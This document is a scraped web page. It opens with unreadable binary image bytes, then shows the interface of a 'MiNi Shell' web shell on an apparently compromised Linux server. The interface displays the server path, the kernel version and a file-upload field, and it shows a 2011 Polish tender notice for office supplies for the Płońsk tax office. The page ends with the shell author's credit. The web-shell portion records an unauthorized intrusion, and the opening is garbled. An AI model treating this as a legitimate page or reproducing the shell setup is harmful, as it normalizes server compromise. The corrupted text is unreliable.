JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111215/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111215/332929-N-2011.html

<p class="kh_header"><b>Płońsk: Dostawa papieru kserograficznego oraz innych materiałów biurowych dla Urzędu Skarbowego w Płońsku</b><br>
<b>Numer ogłoszenia: 332929 - 2011; data zamieszczenia: 15.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Skarbowy w Płońsku , ul. Spółdzielcza 2, 09-100 Płońsk, woj. mazowieckie, tel. 023 6623732, faks 023 6629300.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.is.waw.pl/USPlonsk</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa papieru kserograficznego oraz innych materiałów biurowych dla Urzędu Skarbowego w Płońsku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa papieru kserograficznego oraz innych materiałów biurowych dla Urzędu Skarbowego w Płońsku wg poniższej specyfikacji:

1.	Blok w kratkę makulaturowy A4, klejony na górze, z okładką, 100 kartek	Szt. 80;
2.	Długopis zwykły czarny, z wymiennym wkładem	Szt. 150;
3.	Wkład do długopisu jw., kolor czarny	Szt. 100;
4.	Długopis zwykły czerwony, z wymiennym wkładem	Szt. 20;
5.	Wkład do długopisu jw., kolor czerwony	Szt. 10;
6.	Długopis zwykły niebieski, z wymiennym wkładem	Szt. 150;
7.	Wkład do długopisu jw., kolor niebieski	Szt. 100;
8.	Długopis z przylepcem na sprężynce, stojący z wymiennym wkładem, wkład koloru niebieskiego	Szt. 160;
9.	Długopis żelowy czarny	Szt. 20;
10.	Długopis żelowy czerwony	Szt. 10;
11.	Dziurkacz biurowy, dwutorowy, rozstaw dziurek 80 mm, średnica dziurek 5,5 mm, jednorazowo dziurkuje do 25 kartek, wyposażony w ogranicznik papieru oraz pojemnik na śmieci	Szt. 10;
12.	Dziurkacz biurowy, dwutorowy, rozstaw dziurek 80 mm, średnica dziurek 5,5 mm, z możliwością dziurkowania ok. 15 kartek, wyposażony w pojemnik na śmieci	Szt. 10;
13.	Flamaster biurowy, zwykły, kolor czarny	Szt. 100;
14.	Flamaster biurowy, zwykły, kolor czerwony	Szt. 30;
15.	Foliowe okładki do bindowania o grubości 200 mic., format A4, przezroczyste, bezbarwne (op. - 100 szt.)	Op. 2;
16.	Gumka do ścierania typu Pentel ZEH05 przeznaczona do ścierania ołówka, nie krusząca się	Szt. 80;
17.	Grzbiety do bindowania 6 mm (op. 100 szt.)	Op. 1;
18.	Grzbiety do bindowania 8 mm (op. 100 szt.)	Op. 1;
19.	Grzbiety do bindowania 10 mm (op. 100 szt.)	Op. 1;
20.	Kalka ołówkowa A4 (op. - 50 szt.)	Op. 10;
21.	Karteczki kostka o wym. 85mm x 85mm x 35 mm, biała klejona w bloczku	Bloczków 120;
22.	Karteczki samoprzylepne o wym. 76 mm x 76 mm, klejone wzdłuż jednego boku, żółte, ilość kartek w bloczku 100	Bloczków 60;
23.	Karteczki znaczniki samoprzylepne kolorowe	Bloczków 5;
24.	Kartony do archiwizacji, grzbiet 100 mm, pojemność 1000 
kartek A4, wymiary 350x100x250 mm	Szt. 500;
25.	Kaseta DAT HP 72	Szt. 20;
26.	Kaseta DAT - 160	Szt. 30;
27.	Kaseta DDS-4	Szt. 30;
28.	Klej biurowy w sztyfcie 25-35g., bezwonny, nietoksyczny, do klejenia papieru, tektury itp.	Szt. 100;
29.	Koperta biała DL SK okno prawe, samoprzylepna (klej na dwóch klejących się powierzchniach), (op. - 1000 szt.)	Op. 30;
30.	Koperta C-6 (114x162), biała, samoprzylepna (klej na dwóch klejących się powierzchniach), (op. - 1000 szt.)	Op. 10;
31.	Korektor w piórze, z metalowa końcówką	Szt. 20;
32.	Koszulki foliowe A4, przezroczyste, do segregatora, wykonane z folii PP o grubości ok. 50 mikronów, otwierane od góry, (op. - 100 szt.)	Op. 50;
33.	Koszulki foliowe A5, przezroczyste, do segregatora, wykonane z folii PP o grubości ok. 50 mikronów, otwierane od góry, (op. - 100 szt.)	Op. 2;
34.	Linijka ok. 30 cm., z trwałą, nieścieralną, precyzyjną podziałką w mm. 	Szt. 10;
35.	Maczałka glicerynowa (nawilżacz do palców), bezbarwna, bezwonna, na bazie gliceryny, poj. 20 mm	Szt. 10;
36.	Marker czarny, permanentny, gruby, okrągła końcówka wodoodporny 	Szt. 30;
37.	Nożyczki do cięcia papieru, ergonomicznie wyprofilowany uchwyt, ok. 20 cm., ostrze ze stali nierdzewnej	Szt. 10;
38.	Okładka do bindowania A4, nieprzezroczysta, kolorowa, ze sztywnego tworzywa (op. 100 szt.)	Op. 1;
39.	Ołówek drewniany o twardości HB, z zaokrąglona końcówką, bez gumki	Szt. 80;
40.	Papier kserograficzny A3*	Ryz 10;
41.	Papier kserograficzny A4*	Ryz 1000;
42.	Papier komputerowy składanka 375x12x1, gram. 70 g/m2	Op. 25;
43.	Pianka antystatyczna do czyszczenia obudowy komputerów, pojemność 400 ml.	Szt. 5;
44.	Pinezki srebrne (op.-50 szt.)	Op. 5;
45.	Pisak do płyt CD/DVD, szerokość linii pisania 0,8 - 1,0 mm, kolor czarny	Szt. 2;
46.	Płyta CD - R, 700 MB	Szt. 40;
47.	Płyta DVD+R, 4,7 GB	Szt. 40;
48.	Poduszka do stempli w pudełku z tworzywa, zawierająca wkład barwiący, o wym. 7x11 cm	Szt. 2;
49.	Powietrze sprężone, przeznaczone do usuwania zanieczyszczeń z trudno dostępnych miejsc sprzętu komputerowego, poj. 400 ml.	Szt. 10;
50.	Przekładki polipropylowe ( literowe) A4, multiperforowane, pasują do każdego segregatora, format A4	Op. 3;
51.	Rozszywacz, do wszystkich rodzajów zszywek zaopatrzony w ergonomiczne uchwyty o antypoślizgowej powierzchni	Szt. 20;
52.	Segregator A4 z mechanizmem dźwigniowym, w grubej nielaminowanej oprawie z okuciami - szer. grzbietu 50mm 	Szt. 50;
53.	Segregator A4 z mechanizmem dźwigniowym, w grubej nielaminowanej oprawie z okuciami - szer. grzbietu  75 mm.	Szt. 150;
54.	Skoroszyt tekturowy A4 oczkowy pełny, biały, wpinany do segregatora, wykonany z kartonu grubości 250g/m2 (op. - 50 szt.)	Op. 30;
55.	Skoroszyt A4 zwykły, kartonowy, biały, wykonany z kartonu o grubości 250g/m2 (op. - 50 szt.)	Op. 4;
56.	Skoroszyt A4, wykonany z folii PCV, przednia okładka przezroczysta, tylna kolorowa (granatowa) wpinany do segregatora, (op. - 10 szt.)	Op. 230;
57.	Skorowidz A4 96k. w kratkę w twardej okładce	Szt. 15;
58.	Spinacze biurowe, owalne, metalowe, srebrne, R28, (op. 100 szt.) 	Op. 50;
59.	Spinacze biurowe, owalne, metalowe, srebrne, R50 (op. 100 szt.)	Op. 50;
60.	Taśma samoprzylepna przezroczysta 24 mm	Szt. 40;
61.	Teczka kartonowa, wiązana, biała, na dokumenty A4, wykonana z kartonu o grubości 250g/m2 , posiada 3 wewnętrzne zakładki zabezpieczające przed wypadaniem dokumentów (op. - 50 szt.)	Op. 300;
62.	Teczka z rzepem, do przechowywania dokumentów A4	Szt. 10;
63.	Temperówka metalowa	Szt. 15;
64.	Tusz do stempli gumowych i polimerowych, (do stempli ręcznych i samotuszujących z gumową lub polimerową płytką stemplującą), buteleczka z końcówką ułatwiającą nasączanie poduszek, bezolejowy, czerwony (25 ml)	Szt. 80;
65.	Tusz do stempli gumowych i polimerowych, (do stempli ręcznych i samotuszujących z gumową lub polimerową płytką stemplującą), buteleczka z końcówką ułatwiającą nasączanie poduszek, bezolejowy, czarny (25 ml)	Szt. 5;
66.	Wąsy do skoroszytu (op. 25 szt.)	Op. 5;
67.	Wkład do długopisu typu Zenith metalowy, o dużej pojemności, grubość linii pisania 0,5 mm, kolor czarny	Szt. 80;
68.	Zakreślacz żółty	Szt. 40;
69.	Zakreślacz  zielony	Szt. 30;
70.	Zeszyt A4 96k. w kratkę w twardej oprawie	Szt. 15;
71.	Zeszyt A5 96k. w kratkę w twardej oprawie	Szt. 10;
72.	Zszywacz ręczny biurowy, na zszywki 24/6, jednorazowo zszywa do 30 kartek	Szt. 15;
73.	Zszywki 23/10 (op. 1000)	Op. 20;
74.	Zszywki 24/6 (op. - 1000)	Op. 500;
75.	Zszywki 24/8 (op. - 1000)	Op. 20;
76.	Zszywki 24/10 (op. - 1000)	Op. 20..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 24.11.32.00-1, 30.23.73.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub aktualnie wykonuje min. 2 dostawy papieru kserograficznego oraz innych materiałów biurowych o wartości nie mniejszej niż 40.000,00 zł brutto każda.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) W przypadku ustanowienia pełnomocnika do reprezentacji w postępowaniu do oferty należy załączyć pełnomocnictwo rodzajowe lub szczegółowe wskazujące zakres pełnomocnictwa dla ustanowionego pełnomocnika. Pełnomocnictwo winno być złożone w oryginale lub w formie odpisu potwierdzonego notarialnie. 

2) W przypadku oferty składanej przez wykonawców ubiegających się wspólnie o udzielenie zamówienia - udzielone pełnomocnictwo rodzajowe liderowi wykonawców wspólnie ubiegających się o udzielenie zamówienia w oryginale lub w formie odpisu potwierdzonego notarialnie, jednocześnie wskazujące zakres pełnomocnictwa, co do reprezentacji, podpisania umowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z dyspozycją art. 144 ust. 1 Ustawy dopuszcza następujące istotne zmiany treści umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy i jej warunki:

1) Zmiana przedstawicieli wykonawcy w odniesieniu do realizacji przedmiotu umowy;

2) Zmiana wartości brutto przedmiotu umowy, cen jednostkowych (brutto) i wartości (brutto) poszczególnych pozycji o kwoty wynikające z ewentualnej zmiany stawek VAT obowiązujących w dacie powstania obowiązku podatkowego w czasie trwania umowy; zmiana taka zostanie dokonana w formie pisemnego aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.is.waw.pl/USPlonsk<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Skarbowy w Płońsku ul. Spółdzielcza 2, 09-100 Płońsk..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.12.2011 godzina 09:00, miejsce: Oferty należy składać w Urzędzie Skarbowym w Płońsku przy ul. Spółdzielczej 2 w pokoju nr 12 (Sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com